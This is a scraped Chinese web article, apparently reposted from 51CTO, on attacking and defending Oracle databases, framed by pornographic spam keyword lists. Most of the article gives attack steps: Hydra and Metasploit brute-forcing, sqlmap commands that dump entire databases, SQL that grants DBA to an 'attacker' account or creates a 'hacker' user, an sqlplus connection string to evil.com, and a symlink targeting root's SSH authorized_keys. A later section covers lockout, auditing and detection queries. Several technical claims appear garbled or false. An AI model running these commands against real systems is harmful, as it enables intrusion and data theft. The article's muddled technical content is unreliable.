高清视频在线观看免费播放器-伊人日本-色九月综合-18禁止看的免费污网站-免费观看性行为视频的网站-天天碰天天操-久久精品国产欧美日韩99热-中文字幕在线视频不卡-国产偷人妻精品一区二区在线-国内精品久-伊人影院在线看-密臀av一区-久久综合五月丁香久久激情-福利一区福利二区-gg国产精品国内免费观看-国产精品 高清 尿 小便 嘘嘘

當(dāng)前位置: 首頁(yè) >綜合 > 正文

Oracle密碼暴力破解、提權(quán)、安全審計(jì)及防御 全球熱推薦

2023-06-20 10:21:02 來(lái)源:51CTO
1.1Oracle密碼暴力破解工具及方法1.1.1基于Metasploit的login_brute工具

Metasploit框架內(nèi)置了名為“l(fā)ogin_brute”的模塊,可以利用字典文件暴力破解Oracle數(shù)據(jù)庫(kù)密碼,但是使用該工具需要先獲得Oracle數(shù)據(jù)庫(kù)的用戶名。如果你沒(méi)有獲得目標(biāo)數(shù)據(jù)庫(kù)的用戶名,可以使用任意一種端口掃描工具掃描出目標(biāo)機(jī)器開放的Oracle監(jiān)聽端口,如nmap,masscan等。

步驟1:開展端口掃描


(資料圖片僅供參考)

使用nmap對(duì)目標(biāo)主機(jī)進(jìn)行端口掃描,例如:

nmap -sS -p 1521

步驟2:利用Metasploit進(jìn)行暴力破解

在Metasploit控制臺(tái)中使用以下命令設(shè)置需要破解的Oracle數(shù)據(jù)庫(kù)IP地址、監(jiān)聽端口號(hào)、用戶名和字典文件路徑,然后執(zhí)行run命令即可開始暴力破解。

use auxiliary/scanner/oracle/oracle_loginset RHOSTS set RPORT set USER_FILE set PASS_FILE run1.1.2.基于Hydra的暴力破解

Hydra是一款強(qiáng)大的暴力破解工具,可以用來(lái)暴力破解多種協(xié)議的密碼。這里介紹如何使用Hydra進(jìn)行Oracle數(shù)據(jù)庫(kù)密碼暴力破解。

步驟1:安裝Hydra

在Linux命令行中輸入以下命令安裝Hydra:

sudo apt-get install hydra

步驟2:基于字典文件的暴力破解

如果已知用戶名,可以使用以下命令進(jìn)行暴力破解,其中USERNAME為目標(biāo)賬戶名、PASSWORD_FILE為密碼字典文件的路徑,IP_ADDRESS為目標(biāo)機(jī)器的IP地址,PORT為目標(biāo)Oracle數(shù)據(jù)庫(kù)的監(jiān)聽端口號(hào)。

hydra -L USERNAME -P PASSWORD_FILE IP_ADDRESS -s PORT oracle

步驟3:基于多個(gè)用戶名的暴力破解

如果不知道目標(biāo)用戶的用戶名,可以先使用Metasploit模塊進(jìn)行掃描并獲得用戶名列表,然后使用Hydra對(duì)用戶名列表中的所有用戶進(jìn)行暴力破解。使用以下命令進(jìn)行暴力破解,其中USER_FILE為用戶名字典文件的路徑,PASSWORD_FILE為密碼字典文件的路徑,IP_ADDRESS為目標(biāo)機(jī)器的IP地址,PORT為目標(biāo)Oracle數(shù)據(jù)庫(kù)的監(jiān)聽端口號(hào)。

hydra -L USER_FILE -P PASSWORD_FILE IP_ADDRESS -s PORT oracle

3.基于Oscanner的漏洞掃描工具

Oscanner是一款功能強(qiáng)大的Oracle漏洞掃描工具,它可以掃描Oracle數(shù)據(jù)庫(kù)中存在的安全漏洞和配置錯(cuò)誤。使用該工具可以幫助檢測(cè)Oracle數(shù)據(jù)庫(kù)弱口令等安全問(wèn)題。

步驟1:下載Oscanner

從GitHub上下載Oscanner源代碼,并解壓到本地。在Linux命令行中輸入以下命令:

git clonehttps://github.com/evyatarmeged/Oscanner.git

步驟2:開展漏洞掃描

使用以下命令開展漏洞掃描,其中IP_ADDRESS為目標(biāo)機(jī)器的IP地址,PORT為目標(biāo)Oracle數(shù)據(jù)庫(kù)的監(jiān)聽端口號(hào)。

python OScanner.py –ip IP_ADDRESS –p PORT

掃描結(jié)果將被輸出到屏幕上,并保存到指定的文件中。

1.1.3.基于SQLmap的注入工具

SQLmap是一款流行的SQL注入工具,可以用來(lái)測(cè)試Web應(yīng)用程序是否存在SQL注入漏洞。在Oracle數(shù)據(jù)庫(kù)中,可通過(guò)SQL注入漏洞盜取敏感數(shù)據(jù),包括用戶名和密碼等。以下是利用SQLmap進(jìn)行Oracle數(shù)據(jù)庫(kù)注入攻擊的步驟:

步驟1:下載SQLmap

從GitHub上下載SQLmap源代碼,并解壓到本地。在Linux命令行中輸入以下命令:

git clonehttps://github.com/sqlmapproject/sqlmap.git

步驟2:開展注入攻擊

使用如下命令開始注入攻擊,其中IP_ADDRESS為目標(biāo)機(jī)器的IP地址,PORT為目標(biāo)Oracle數(shù)據(jù)庫(kù)的監(jiān)聽端口號(hào)。

python sqlmap.py -u "http://IP_ADDRESS:PORT/index.php?id=1" --cookie="PHPSESSID=abcdefg" --level 5 --risk 3 --batch --random-agent --dbs

通過(guò)上述命令從目標(biāo)Oracle數(shù)據(jù)庫(kù)中獲取所有可用的數(shù)據(jù)庫(kù)。

步驟3:獲取數(shù)據(jù)表

使用如下命令獲取目標(biāo)Oracle數(shù)據(jù)庫(kù)中的數(shù)據(jù)表:

python sqlmap.py -u "http://IP_ADDRESS:PORT/index.php?id=1" --cookie="PHPSESSID=abcdefg" --level 5 --risk 3 --batch --random-agent -D DATABASE_NAME --tables

步驟4:獲取數(shù)據(jù)列

使用如下命令獲取目標(biāo)Oracle數(shù)據(jù)庫(kù)中數(shù)據(jù)表的所有列:

python sqlmap.py -u "http://IP_ADDRESS:PORT/index.php?id=1" --cookie="PHPSESSID=abcdefg" --level 5 --risk 3 --batch --random-agent -D DATABASE_NAME -T TABLE_NAME --columns

步驟5:獲取數(shù)據(jù)

使用如下命令獲取目標(biāo)Oracle數(shù)據(jù)庫(kù)中的所有數(shù)據(jù):

python sqlmap.py -u "http://IP_ADDRESS:PORT/index.php?id=1" --cookie="PHPSESSID=abcdefg" --level 5 --risk 3 --batch --random-agent -D DATABASE_NAME -T TABLE_NAME --dump

將上述命令中的“IP_ADDRESS”、“PORT”、“DATABASE_NAME”和“TABLE_NAME”替換為實(shí)際的值即可進(jìn)行Oracle數(shù)據(jù)庫(kù)注入攻擊。

1.2一些開源的Oracle管理工具1.2.1PL/SQL Developer

PL/SQL Developer是一種跨平臺(tái)的IDE,允許用戶開發(fā)、測(cè)試和調(diào)試PL/SQL代碼。它包括諸如語(yǔ)法高亮顯示、代碼折疊、自動(dòng)完成等功能,并且可與Oracle數(shù)據(jù)庫(kù)集成。官方地址:

https://www.allroundautomations.com/products/pl-sql-developer/

1.2.2SQL Developer

SQL Developer是一種功能強(qiáng)大的跨平臺(tái)工具,可以與多種數(shù)據(jù)庫(kù)管理系統(tǒng)集成,包括Oracle。它支持諸如SQL腳本編輯、數(shù)據(jù)查詢、表和字段管理等功能。此外,還提供了一些有用的插件和擴(kuò)展。

官方地址:https://www.oracle.com/tools/downloads/sqldev-downloads.html

1.2.3TOra

TOra是一種開源的Oracle管理工具,可用于管理Oracle數(shù)據(jù)庫(kù)。它支持各種Oracle對(duì)象的瀏覽和編輯,包括表、視圖、過(guò)程、函數(shù)、觸發(fā)器等。TOra也提供了一些有用的功能,例如SQL查詢和編輯、數(shù)據(jù)導(dǎo)入和導(dǎo)出等。

官方地址:http://tora.sourceforge.net/

1.2.4Oracle SQLcl

Oracle SQLcl是一種跨平臺(tái)的命令行工具,允許用戶執(zhí)行SQL查詢和命令。它包括一些有用的功能,例如語(yǔ)法高亮顯示、自動(dòng)完成和歷史記錄等,并且可與Oracle數(shù)據(jù)庫(kù)集成。

官方地址:https://www.oracle.com/database/technologies/appdev/sqlcl.html

1.2.5Oracle APEX

Oracle APEX是一種基于Web的開發(fā)工具,用于開發(fā)和部署企業(yè)級(jí)應(yīng)用程序。它使用Oracle數(shù)據(jù)庫(kù)作為后端,并提供了一些有用的功能,例如表和字段管理、報(bào)告生成、工作流程管理等。Oracle APEX也是一種開放源代碼的工具,用戶可以免費(fèi)使用和分發(fā)。

官方地址:https://apex.oracle.com/en/

1.3Oracle數(shù)據(jù)庫(kù)提權(quán)1.3.1Oracle數(shù)據(jù)庫(kù)提權(quán)主要途徑

1. 利用無(wú)效對(duì)象進(jìn)行提權(quán)

在Oracle中,無(wú)效對(duì)象指的是失效或異常的存儲(chǔ)過(guò)程、函數(shù)、觸發(fā)器等。攻擊者可以通過(guò)修改或者篡改其中的無(wú)效對(duì)象,實(shí)現(xiàn)提權(quán)目的。

2. 利用數(shù)據(jù)庫(kù)連接字符串提權(quán)

當(dāng)連接到Oracle數(shù)據(jù)庫(kù)時(shí),如果使用了高權(quán)限用戶如SYS或SYSTEM,并且在連接字符串中沒(méi)有明確地指定要訪問(wèn)的具體數(shù)據(jù)庫(kù),則默認(rèn)會(huì)連接到一個(gè)叫做“ORCL”或“XE”的測(cè)試數(shù)據(jù)庫(kù)上。攻擊者可以通過(guò)構(gòu)造惡意數(shù)據(jù)庫(kù)并偽裝成“ORCL”或“XE”,欺騙管理員連接到惡意數(shù)據(jù)庫(kù),并以高權(quán)限用戶身份執(zhí)行惡意操作。

3. 利用ORACLE_HOME目錄漏洞進(jìn)行提權(quán)

ORACLE_HOME目錄是Oracle軟件安裝的根目錄,通常包含各種配置文件、日志文件、庫(kù)文件等。如果對(duì)ORACLE_HOME目錄的權(quán)限

1.3.2Oracle數(shù)據(jù)提權(quán)參考詳細(xì)方法及步驟

1.利用無(wú)效對(duì)象進(jìn)行提權(quán)

在Oracle中,無(wú)效對(duì)象指的是失效或異常的存儲(chǔ)過(guò)程、函數(shù)、觸發(fā)器等。攻擊者可以通過(guò)修改或者篡改其中的無(wú)效對(duì)象,實(shí)現(xiàn)提權(quán)目的。例如:

CREATE OR REPLACE PROCEDURE pwn ASPRAGMA AUTONOMOUS_TRANSACTION;BEGINEXECUTE IMMEDIATE "GRANT DBA TO attacker";COMMIT;END;/ALTER PROCEDURE pwn COMPILE REUSE SETTINGS;

以下是利用無(wú)效對(duì)象進(jìn)行提權(quán)的一般步驟:

(1)創(chuàng)建無(wú)效對(duì)象

攻擊者需要?jiǎng)?chuàng)建一個(gè)無(wú)效的 Oracle 對(duì)象并嵌入惡意代碼,例如一個(gè)無(wú)效的存儲(chǔ)過(guò)程、函數(shù)、觸發(fā)器等。

CREATE OR REPLACE FUNCTION invalid_func (input IN VARCHAR2) RETURN INTEGER ASBEGIN-- 惡意代碼EXECUTE IMMEDIATE "CREATE USER hacker IDENTIFIED BY 1234";RETURN 1;END;/

(2)注冊(cè)無(wú)效對(duì)象

攻擊者需要將無(wú)效對(duì)象注冊(cè)到Oracle數(shù)據(jù)庫(kù)中。這可以通過(guò)運(yùn)行無(wú)效對(duì)象來(lái)完成。

EXEC invalid_func("test");

如果無(wú)效對(duì)象中嵌入的惡意代碼得到執(zhí)行,攻擊者將創(chuàng)建一個(gè)名為“hacker”的新用戶。此時(shí),攻擊者可以以新用戶的身份登陸到數(shù)據(jù)庫(kù)并執(zhí)行任意操作。

(3)提權(quán)

已創(chuàng)建的新用戶可以用于提升攻擊者的權(quán)限。例如,可以使用新用戶連接到 Oracle 數(shù)據(jù)庫(kù)并執(zhí)行敏感操作,或者利用新用戶訪問(wèn)具有高權(quán)限的系統(tǒng)資源。

以下是一些參考命令:

創(chuàng)建無(wú)效函數(shù)

CREATE OR REPLACE FUNCTION invalid_func (input IN VARCHAR2) RETURN INTEGER ASBEGIN-- 惡意代碼EXECUTE IMMEDIATE "CREATE USER hacker IDENTIFIED BY 1234";RETURN 1;END;/

注冊(cè)無(wú)效函數(shù)

EXEC invalid_func("test");

需要注意的是,為了防止此類攻擊,Oracle管理員應(yīng)該定期檢查 Oracle 數(shù)據(jù)庫(kù)中的無(wú)效對(duì)象,并刪除可能包含惡意代碼的對(duì)象。

2.利用數(shù)據(jù)庫(kù)連接字符串提權(quán)

當(dāng)連接到Oracle數(shù)據(jù)庫(kù)時(shí),如果使用了高權(quán)限用戶如SYS或SYSTEM,并且在連接字符串中沒(méi)有明確地指定要訪問(wèn)的具體數(shù)據(jù)庫(kù),則默認(rèn)會(huì)連接到一個(gè)叫做“ORCL”或“XE”的測(cè)試數(shù)據(jù)庫(kù)上。攻擊者可以通過(guò)構(gòu)造惡意數(shù)據(jù)庫(kù)并偽裝成“ORCL”或“XE”,欺騙管理員連接到惡意數(shù)據(jù)庫(kù),并以高權(quán)限用戶身份執(zhí)行惡意操作。例如:

sqlplus SYS/password@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=evil.com)(PORT=1521))(CONNECT_DATA=(SID=ORCL)))

以下是利用數(shù)據(jù)庫(kù)連接字符串進(jìn)行提權(quán)的一般步驟:

(1)構(gòu)造惡意數(shù)據(jù)庫(kù)

攻擊者需要構(gòu)造一個(gè)惡意數(shù)據(jù)庫(kù),并將其偽裝成“ORCL”或“XE”??梢允褂肙racle官方提供的創(chuàng)建數(shù)據(jù)庫(kù)工具或手動(dòng)創(chuàng)建數(shù)據(jù)庫(kù)。

(2)監(jiān)聽端口和服務(wù)名稱

為了將惡意數(shù)據(jù)庫(kù)偽裝成“ORCL”或“XE”,需要在監(jiān)聽器中添加服務(wù)名稱和監(jiān)聽端口??梢酝ㄟ^(guò)修改listener.ora文件或通過(guò)Oracle Net Manager添加服務(wù)名稱和監(jiān)聽端口來(lái)完成此操作。

(3)模擬Oracle服務(wù)器

攻擊者需要模擬Oracle服務(wù)器,接受管理員的連接請(qǐng)求,并將其重定向到惡意數(shù)據(jù)庫(kù)。可以使用Metasploit框架中的Oracle SQL鏈接跟蹤追蹤模塊實(shí)現(xiàn)這一點(diǎn)。

(4)連接到惡意數(shù)據(jù)庫(kù)

管理員使用高權(quán)限用戶如SYS或SYSTEM來(lái)連接到Oracle數(shù)據(jù)庫(kù)時(shí),如果在連接字符串中沒(méi)有明確指定要訪問(wèn)的具體數(shù)據(jù)庫(kù),則默認(rèn)連接到“ORCL”或“XE”測(cè)試數(shù)據(jù)庫(kù)上。攻擊者可以構(gòu)造一個(gè)連接字符串,指定惡意數(shù)據(jù)庫(kù)的地址和端口,以欺騙管理員連接到惡意數(shù)據(jù)庫(kù)。

例如,以下命令將在主機(jī)evil.com上連接到名為ORCL_BACKDOOR的惡意數(shù)據(jù)庫(kù):

sqlplus SYS/password@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=evil.com)(PORT=1521))(CONNECT_DATA=(SID=ORCL_BACKDOOR)))

(5)執(zhí)行惡意操作

如果連接成功,攻擊者將能夠以高權(quán)限用戶身份執(zhí)行任意惡意操作。例如,可以在Oracle數(shù)據(jù)庫(kù)中創(chuàng)建新用戶、修改或刪除數(shù)據(jù)庫(kù)中的數(shù)據(jù)等。

需要注意的是,Oracle管理員應(yīng)該在輸入任何連接信息之前仔細(xì)驗(yàn)證其合法性,尤其是在連接于高權(quán)限用戶時(shí)。另外,為了防止此類攻擊,Oracle管理員應(yīng)該定期檢查監(jiān)聽器配置,并配置適當(dāng)?shù)臋?quán)限和保護(hù)措施。

3.利用ORACLE_HOME目錄漏洞進(jìn)行提權(quán)

ORACLE_HOME目錄是Oracle軟件安裝的根目錄,通常包含各種配置文件、日志文件、庫(kù)文件等。如果對(duì)ORACLE_HOME目錄的權(quán)限過(guò)高或者存在漏洞,則攻擊者可以輕易地獲取敏感信息或者利用其中的漏洞進(jìn)行提權(quán)。例如:

ln -s /root/.ssh/authorized_keys $ORACLE_HOME/dbs/init$ORACLE_SID.ora

詳細(xì)參考步驟如下:

(1)查找ORACLE_HOME目錄

可以通過(guò)以下命令查找ORACLE_HOME目錄:

ps -ef | grep pmon

該命令將顯示正在運(yùn)行的Oracle進(jìn)程名稱和對(duì)應(yīng)的目錄,其中ORACLE_HOME為Oracle軟件的根目錄。

(2)查找可寫ORACLE_HOME目錄

攻擊者需要找到具有寫入權(quán)限的ORACLE_HOME目錄,以便在其中放置惡意程序或修改配置文件。以下命令可用于查找可寫的ORACLE_HOME目錄:

find / -name "*.ora" -type f -exec ls -l {} \;

該命令將查找所有擴(kuò)展名為.ora的文件,并列出其所在的目錄及權(quán)限信息。

(3)放置惡意程序或修改配置文件

攻擊者可以將惡意程序放置在可寫的ORACLE_HOME目錄中,并運(yùn)行它以獲得更高的權(quán)限。另外,攻擊者還可以修改Oracle的配置文件,以更改數(shù)據(jù)庫(kù)實(shí)例的配置或執(zhí)行其他惡意操作。

(4)提升權(quán)限并獲取敏感信息

通過(guò)在可寫的ORACLE_HOME目錄中放置惡意程序或修改配置文件,攻擊者獲得了更高的權(quán)限。這使得攻擊者可以輕松地獲取敏感信息,或在Oracle數(shù)據(jù)庫(kù)中執(zhí)行其他有害操作。

需要注意的是,為了防止此類攻擊,Oracle管理員應(yīng)該定期檢查ORACLE_HOME目錄的權(quán)限和安全性,并配置適當(dāng)?shù)臋?quán)限和保護(hù)措施。

1.4.Oracle數(shù)據(jù)暴力破解及其他安全檢測(cè)方法1.4.1暴力破解安全防范方法

1.啟用賬戶鎖定功能

Oracle 數(shù)據(jù)庫(kù)提供了賬戶鎖定功能,可以在用戶一定數(shù)量的登錄失敗嘗試后自動(dòng)鎖定用戶。這可以有效防止攻擊者使用暴力破解工具進(jìn)行破解:

ALTER PROFILE default LIMIT FAILED_LOGIN_ATTEMPTS 3 PASSWORD_LOCK_TIME 1;

2.配置訪問(wèn)控制列表(ACL)

ACL 可以限制特定 IP 地址或網(wǎng)絡(luò)的訪問(wèn),防止攻擊者使用暴力破解工具對(duì) Oracle 數(shù)據(jù)庫(kù)進(jìn)行攻擊:

BEGINDBMS_NETWORK_ACL_ADMIN.CREATE_ACL (acl => "acl.xml",description => "ACL for example.com",principal => "EXAMPLE.COM",is_grant => TRUE,privilege => "connect",start_date => SYSTIMESTAMP,end_date => NULL);COMMIT;END;/

3.更改默認(rèn)端口

默認(rèn)情況下,Oracle 數(shù)據(jù)庫(kù)使用 1521 端口進(jìn)行通信。攻擊者可以使用端口掃描工具來(lái)探測(cè)并攻擊該端口。因此,管理員應(yīng)該將默認(rèn)端口更改為其他端口:

ALTER SYSTEM SET LOCAL_LISTENER = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=hostname)(PORT=port)))";

3.啟用登錄審計(jì)

啟用登錄審計(jì)可以記錄用戶登錄數(shù)據(jù)庫(kù)的詳細(xì)信息,包括時(shí)間、IP 地址和失敗嘗試次數(shù)等。這可以幫助管理員及時(shí)發(fā)現(xiàn)并應(yīng)對(duì)暴力破解攻擊:

AUDIT SESSION WHENEVER NOT SUCCESSFUL;1.4.2其他安全檢測(cè)方法

1.定期檢查 Oracle 數(shù)據(jù)庫(kù)中的無(wú)效對(duì)象

攻擊者通常會(huì)利用無(wú)效對(duì)象進(jìn)行提權(quán)。因此,Oracle 管理員應(yīng)該定期檢查 Oracle 數(shù)據(jù)庫(kù)中是否有無(wú)效對(duì)象,并刪除可能包含惡意代碼的對(duì)象:

SELECT owner, object_name, object_type, statusFROM dba_objectsWHERE status = "INVALID";

2.檢查特權(quán)用戶的密碼強(qiáng)度

特權(quán)用戶如 SYS 或 SYSTEM 用戶帳戶對(duì) Oracle 數(shù)據(jù)庫(kù)具有特殊權(quán)限,攻擊者通常會(huì)嘗試使用默認(rèn)或弱密碼來(lái)破解這些賬戶。因此,管理員應(yīng)該確保特權(quán)用戶的密碼足夠強(qiáng)大,并定期更改密碼:

SELECT username, account_status FROM dba_users WHERE username IN ("SYS", "SYSTEM");

3.檢查連接字符串參數(shù)

Oracle 連接字符串中的參數(shù)可以影響數(shù)據(jù)庫(kù)的安全性。管理員應(yīng)該檢查參數(shù)值是否正確,并限制訪問(wèn)級(jí)別:

SELECT name, value FROM v$parameter WHERE name IN ("remote_login_passwordfile", "audit_sys_operations", "os_authent_prefix");

4.檢查監(jiān)聽器配置

監(jiān)聽器是 Oracle 數(shù)據(jù)庫(kù)的入口點(diǎn),攻擊者可以通過(guò)監(jiān)聽器進(jìn)行入侵。管理員應(yīng)該檢查監(jiān)聽器的配置,確保其安全性:

lsnrctl status

5.檢查數(shù)據(jù)庫(kù)日志

管理員應(yīng)該檢查數(shù)據(jù)庫(kù)日志以獲取有關(guān)可能的安全漏洞和入侵活動(dòng)的信息:

SELECT to_char(timestamp, "YYYY-MM-DD HH24:MI:SS"), username, action_name, object_name, sql_textFROM dba_audit_trailWHERE audit_timestamp > SYSDATE - 1;

6.檢查角色權(quán)限

攻擊者可以利用角色權(quán)限進(jìn)行提權(quán),因此管理員應(yīng)該檢查角色的權(quán)限配置,并刪除不必要的權(quán)限:

SELECT grantee, privilege, admin_option FROM dba_sys_privs WHERE grantee IN (SELECT DISTINCT granted_role FROM dba_role_privs);

7.檢查用戶權(quán)限

攻擊者可以通過(guò)某些用戶權(quán)限進(jìn)行提權(quán)。管理員應(yīng)該檢查用戶的權(quán)限配置,并刪除不必要的權(quán)限:

SELECT grantee, granted_role, admin_option FROM dba_role_privs WHERE grantee IN (SELECT DISTINCT username FROM dba_users);

8.檢查用戶自定義函數(shù)

攻擊者可以通過(guò)用戶自定義函數(shù)進(jìn)行提權(quán)。管理員應(yīng)該檢查用戶自定義函數(shù)的源碼,以確保其安全性:

SELECT owner, name, type, text FROM dba_source WHERE type = "FUNCTION" AND line = 1 ORDER BY owner, name, type;

9.檢查安全警報(bào)日志

Oracle 提供了一個(gè)安全警報(bào)框架,可以監(jiān)測(cè)和記錄各種安全事件。管理員應(yīng)該檢查安全警報(bào)日志以偵測(cè)潛在的安全威脅:

SELECT * FROM dba_audit_object WHERE owner = "SYS" AND object_name LIKE "TBS%";1.5Oracle安全審計(jì)開源工具1.5.1Oracle Password Auditor (OPA)

功能:用于檢查 Oracle 數(shù)據(jù)庫(kù)中的弱口令,常見口令和安全策略是否得到正確實(shí)施。

下載地址:https://www.slac.stanford.edu/xorg/nmtf/nmtf-tools-opa.html

使用步驟和命令:

●下載 OPA 工具并解壓縮它。

●打開命令提示符或終端窗口,并切換到 OPA 的目錄。

●輸入以下命令以啟動(dòng) OPA 工具:

opa.exe -u -p -s

您還可以通過(guò)添加其他參數(shù)來(lái)自定義掃描設(shè)置,如下所示:

opa.exe -u -p -s --weakpass --defaultpass --policycheck

運(yùn)行完命令后,請(qǐng)等待掃描完成,該工具將生成一個(gè) HTML 報(bào)告,其中包含您查詢的所有信息。

1.5.2Oracle E-Business Suite Password Audit

功能:用于檢查 Oracle EBS 中的弱口令、常見口令和過(guò)期口令,以保護(hù) Oracle EBS 應(yīng)用程序的安全性。

下載地址:https://www.oracle.com/technetwork/apps-tech/security-ebs-password-audit-129472.pdf

使用步驟:

●下載 Oracle EBS 密碼審計(jì)工具并安裝它。

●打開工具并輸入您的 Oracle EBS 應(yīng)用程序的連接信息,然后單擊“掃描”按鈕。

工具將自動(dòng)執(zhí)行密碼掃描并生成報(bào)告。您可以查看報(bào)告并按照其建議修復(fù)密碼問(wèn)題。

1.5.3Oracle Password Cracker

功能:用于破解 Oracle 數(shù)據(jù)庫(kù)用戶的密碼。

下載地址:https://sourceforge.net/projects/oraclepwdcracker/

使用步驟和命令:

●確定您要破解的 Oracle 數(shù)據(jù)庫(kù)用戶名。

●下載并安裝 Oracle Password Cracker 工具。

●打開命令提示符或終端窗口,并切換到 Oracle Password Cracker 的目錄。

●根據(jù)以下命令格式運(yùn)行工具:

orapwdcrack.exe -u -H <哈希密碼> -d <字典文件路徑>

工具將嘗試使用給定的字典文件破解密碼,并在成功時(shí)輸出密碼。

1.5.4OraPwdCrack

功能:用于使用 GPU 加速破解 Oracle 數(shù)據(jù)庫(kù)密碼。

下載地址:https://github.com/milo2012/orapwdcrack

使用步驟和命令:

●確保計(jì)算機(jī)安裝了適當(dāng)?shù)?NVIDIA 或 AMD 顯卡驅(qū)動(dòng)程序和 CUDA 或 OpenCL 環(huán)境。

●下載 OraPwdCrack 工具并解壓縮它。

●打開命令提示符或終端窗口,并切換到 OraPwdCrack 的目錄。

●根據(jù)以下命令格式運(yùn)行工具:

orapwddump.exe User@Host:Port ServiceName [] [<特殊選項(xiàng)>]

根據(jù)需要修改命令參數(shù),如 CUDA/OpenCL 設(shè)備編號(hào)、特殊選項(xiàng)等。

工具將嘗試使用 GPU 加速破解密碼,并在成功時(shí)輸出密碼。

1.5.5PWDumpX

功能:用于提取 Oracle 用戶的哈希密碼。

下載地址:https://www.tarasco.org/security/pwdumpx.htm

使用步驟和命令:

●確定您要提取其哈希密碼的 Oracle 用戶名。

●下載 PWDumpX 工具并解壓縮它。

●打開命令提示符或終端窗口,并切換到 PWDumpX 的目錄。

●根據(jù)以下命令格式運(yùn)行工具:

pwdumpx.exe -u -p -h

工具將提取您指定的用戶名的哈希密碼,并在命令行窗口中輸出它們。

1.5.6Oracle Security Check Tool (OSCT)

功能:用于檢查 Oracle 數(shù)據(jù)庫(kù)中的安全問(wèn)題,如弱口令、未授權(quán)訪問(wèn)等。

下載地址:https://www.oracle.com/technetwork/security/testout-oracle-security-check-tool-130994.pdf

使用步驟:

●下載和安裝 Oracle Security Check Tool(OSCT)。

●打開工具并輸入您的 Oracle 數(shù)據(jù)庫(kù)憑據(jù)和連接信息,然后單擊“掃描”按鈕。

●工具會(huì)自動(dòng)執(zhí)行安全掃描并生成報(bào)告。您可以根據(jù)報(bào)告中提供的建議來(lái)修復(fù)數(shù)據(jù)庫(kù)中的安全問(wèn)題。

標(biāo)簽:

返回頂部
高清视频在线观看免费播放器-伊人日本-色九月综合-18禁止看的免费污网站-免费观看性行为视频的网站-天天碰天天操-久久精品国产欧美日韩99热-中文字幕在线视频不卡-国产偷人妻精品一区二区在线-国内精品久-伊人影院在线看-密臀av一区-久久综合五月丁香久久激情-福利一区福利二区-gg国产精品国内免费观看-国产精品 高清 尿 小便 嘘嘘
  • <cite id="ecweg"><pre id="ecweg"></pre></cite>
    <rt id="ecweg"><acronym id="ecweg"></acronym></rt>
  • <rt id="ecweg"></rt>
    亚洲黄色小视频在线观看| 国产免费一区二区三区四在线播放| 在线无限看免费粉色视频| 免费国产成人看片在线| 国产成人一区二区三区别| 超碰成人免费在线| 无码人妻丰满熟妇区96| 一区二区xxx| 亚洲综合在线一区二区| 亚洲精品天堂成人片av在线播放| 久久综合久久网| 性欧美videossex精品| 一区二区三区四区毛片| 青青在线视频免费观看| 91猫先生在线| 久久国产精品免费观看| 久久国产成人精品国产成人亚洲 | 成人免费网站入口| 可以免费在线看黄的网站| 爱豆国产剧免费观看大全剧苏畅| 麻豆一区二区三区在线观看| 中国丰满人妻videoshd | 久久久999视频| 老司机av福利| 国产福利一区视频| 男人添女荫道口女人有什么感觉| jizz欧美激情18| 国产乱子伦精品无码专区| 欧美日韩在线观看不卡| xxxx18hd亚洲hd捆绑| 91制片厂免费观看| 日韩精品一区二区三区不卡| 高清无码一区二区在线观看吞精| 在线看的黄色网址| 免费黄色日本网站| 欧美在线观看黄| 一区二区三区四区毛片| 国产超碰在线播放| 免费看又黄又无码的网站| 久久免费一级片| 天天成人综合网| www激情五月| 福利视频999| 91丨九色丨蝌蚪| 欧美日韩在线观看不卡| 日韩 欧美 高清| 国产午夜福利视频在线观看| 婷婷五月综合缴情在线视频| 高清无码一区二区在线观看吞精| 99精品视频免费版的特色功能| 日本xxxx黄色| 天堂在线一区二区三区| 一本色道久久亚洲综合精品蜜桃| 国产麻花豆剧传媒精品mv在线| 99在线观看视频免费| 日本wwwcom| 97国产精东麻豆人妻电影| 日韩欧美猛交xxxxx无码| 久久精品在线免费视频| 青青青在线观看视频| 国产成a人亚洲精v品在线观看| 欧洲精品在线播放| av7777777| 日本888xxxx| 中文字幕制服丝袜在线| 激情视频小说图片| 久久久久久免费看| 日韩精品一区二区三区久久| 日韩a在线播放| 中文字幕日韩综合| 国产高清不卡无码视频| 91专区在线观看| www.色偷偷.com| 一级黄色高清视频| 欧洲精品在线播放| av片中文字幕| 亚洲成年人专区| 青草视频在线观看视频| 成人观看免费完整观看| 久久国产精品国产精品| 麻豆一区二区三区在线观看| 久久国产亚洲精品无码| 天天视频天天爽| 日本一本中文字幕| 最新中文字幕免费视频| 欧美另类videos| 999精品视频在线| 国产手机视频在线观看| 久久9精品区-无套内射无码| 99精品视频国产| www.玖玖玖| 肉大捧一出免费观看网站在线播放 | 国产日本在线播放| 天天干天天玩天天操| 无码熟妇人妻av在线电影| 午夜两性免费视频| 免费在线a视频| 50度灰在线观看| 性欧美1819| 鲁一鲁一鲁一鲁一色| 五月天婷婷在线观看视频| 俄罗斯av网站| 天天干天天色天天爽| 久久午夜夜伦鲁鲁一区二区| 成人在线观看毛片| 色噜噜狠狠一区二区| 欧美成人一区二区在线观看| 五月天在线免费视频| 在线免费观看av的网站| 北条麻妃69av| 欧美精品久久久久久久久久久| 亚洲精品中文字幕乱码无线| 任你操这里只有精品| 免费看国产曰批40分钟| 日本aa在线观看| 欧美aaa在线观看| 做a视频在线观看| 五月婷婷激情久久| 日韩免费高清在线| 大肉大捧一进一出好爽动态图| 免费无码毛片一区二三区| 奇米777四色影视在线看| 成人短视频在线看| 永久免费黄色片| www.成年人| 亚洲天堂av免费在线观看| www.污污视频| 香蕉视频色在线观看| 樱花草www在线| 久久最新免费视频| 福利在线小视频| 久久综合亚洲精品| 久草免费福利在线| 亚洲美免无码中文字幕在线| 欧美乱大交xxxxx潮喷l头像| 成人区一区二区| 免费毛片小视频| 午夜免费精品视频| 黄色一级片免费的| 黄瓜视频免费观看在线观看www| 日本一二三区在线| 日韩在线视频在线| 国产av天堂无码一区二区三区| 中文字幕日本最新乱码视频| 国产在线观看福利| 天天干天天爽天天射| 亚洲欧美天堂在线| 天天综合五月天| 欧美国产亚洲一区| 国产九九在线观看| 加勒比海盗1在线观看免费国语版| 公共露出暴露狂另类av| 青青草国产精品视频| 久久久久久久少妇| 不卡中文字幕在线| 97国产在线播放| 欧美日韩中文不卡| 免费高清一区二区三区| 日韩中文字幕组| 国内精品国产三级国产99| 日本一本二本在线观看| 日韩a一级欧美一级| 18禁裸男晨勃露j毛免费观看| 免费黄色特级片| 